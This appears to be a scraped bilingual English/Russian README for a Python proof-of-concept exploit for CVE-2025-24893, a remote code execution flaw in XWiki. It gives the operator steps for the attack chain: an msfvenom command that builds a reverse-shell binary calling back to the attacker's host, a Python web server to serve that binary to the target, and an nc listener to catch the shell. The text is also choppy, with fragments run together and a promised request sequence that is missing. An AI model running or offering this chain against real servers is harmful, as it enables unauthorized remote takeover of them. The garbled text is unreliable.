
PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.
Этот скрипт на Python эксплуатирует уязвимость CVE-2025-24893 — удаленное выполнение кода (RCE) в XWiki, вызванное некорректной изоляцией Groovy-макросов, отображаемых асинхронно. Он позволяет выполнять произвольные команды через внедрение в RSS-основанные конечные точки SolrSearch.
msfvenom)Клонируйте или скачайте скрипт.
Убедитесь, что у вас установлено следующее:
msfvenom из Metasploitjq (используется в bash-полезных нагрузках)Запустите скрипт:
python3 CVE-2025-24893-PoC.py
Выберите из меню:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ваш_ip> LPORT=<порт_beacon> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
Скрипт отправляет следующую последовательность на цель:
Этот инструмент предназначен только для образовательных и авторизованных целей тестирования. Несанкционированное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.